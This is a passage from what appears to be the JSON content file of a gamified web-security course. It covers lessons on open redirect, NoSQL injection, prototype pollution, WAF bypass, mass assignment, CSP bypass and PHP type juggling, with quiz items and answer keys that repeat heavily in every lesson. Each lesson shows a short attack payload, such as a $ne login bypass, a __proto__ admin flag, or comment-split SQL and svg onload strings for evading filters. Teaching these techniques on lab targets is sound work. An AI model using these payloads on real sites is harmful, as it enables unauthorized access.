keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"open-redir","cat":"Web Application","title":"Open Redirect","diff":1,"xp":75,"intro":"Redirect to malicious sites.","sections":[{"type":"text","content":"Redirect to malicious sites."},{"type":"code","lang":"http","content":"https://target/login?redirect=https://evil.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Why useful?","opts":["Code exec","Makes phishing look legitimate","DB access","Privesc"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"nosql-inj","cat":"Web Application","title":"NoSQL Injection","diff":2,"xp":150,"intro":"MongoDB operator injection.","sections":[{"type":"text","content":"MongoDB operator injection."},{"type":"code","lang":"js","content":"{\"username\":{\"$ne\":\"\"},\"password\":{\"$ne\":\"\"}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"MongoDB not-equal?","opts":["$eq","$ne","$gt","$or"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"proto-poll","cat":"Web Application","title":"Prototype Pollution","diff":3,"xp":200,"intro":"Modify JS prototypes.","sections":[{"type":"text","content":"Modify JS prototypes."},{"type":"code","lang":"js","content":"{\"__proto__\":{\"isAdmin\":true}}\n// ({}).isAdmin === true"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Enabling property?","opts":["prototype","__proto__","constructor","this"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"waf-bypass","cat":"Web Application","title":"WAF Bypass","diff":3,"xp":200,"intro":"Evade WAFs.","sections":[{"type":"text","content":"Evade WAFs."},{"type":"code","lang":"sql","content":"un/**/ion sel/**/ect 1,2,3\n<svg/onload=alert(1)>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, HTTP header, and cookie value is a potential injection point. The key insight: find where user-controlled data meets server-side processing without proper validation or encoding."},{"type":"tip","content":"Before testing any payload, understand the application's normal behavior. Use it as a regular user first: create an account, explore every feature, map every endpoint. The best bugs are found by understanding the business logic, not just throwing payloads at forms."},{"type":"task","content":"Set up DVWA (Damn Vulnerable Web Application) or bWAPP locally. For each vulnerability type (SQLi, XSS, CSRF, LFI), start at the lowest security level and work your way up. Write down WHY each defense level blocks your previous payload and what you changed to bypass it."},{"type":"quiz","q":"Why do SQL comments bypass?","opts":["Logic change","Regex doesn't match","Encrypts","Encoding"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"biz-logic","cat":"Web Application","title":"Business Logic Flaws","diff":2,"xp":150,"intro":"Exploit flawed app logic.","sections":[{"type":"text","content":"Exploit flawed app logic."},{"type":"code","lang":"http","content":"POST /cart {\"quantity\":-1,\"price\":999}\n# Total: -$999"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Why hard to scan?","opts":["Auth","Unique to each app","Encryption","Server-side"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"mass-assign","cat":"Web Application","title":"Mass Assignment","diff":2,"xp":125,"intro":"Add unintended properties.","sections":[{"type":"text","content":"Add unintended properties."},{"type":"code","lang":"http","content":"POST /register {\"username\":\"user\",\"role\":\"admin\"}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Fix?","opts":["Length limits","Whitelist params","Strong pw","Rate limit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"csp-bypass","cat":"Web Application","title":"CSP Bypass","diff":3,"xp":200,"intro":"Circumvent Content Security Policy.","sections":[{"type":"text","content":"Circumvent Content Security Policy."},{"type":"code","lang":"http","content":"# unsafe-inline \u2192 XSS works\n<script src='https://cdn/jsonp?cb=alert(1)'></script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSP making XSS trivial?","opts":["default-src","unsafe-inline","self","strict-dynamic"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"type-juggle","cat":"Web Application","title":"PHP Type Juggling","diff":2,"xp":150,"intro":"Loose comparison bypass.","sections":[{"type":"text","content":"Loose comparison bypass."},{"type":"code","lang":"php","content":"// md5('240610708') starts with 0e (= 0)\n// md5('QNKCDZO') also starts with 0e\n// With ==: they're EQUAL"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Vulnerable operator?","opts":["===","==","!=","<>"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication 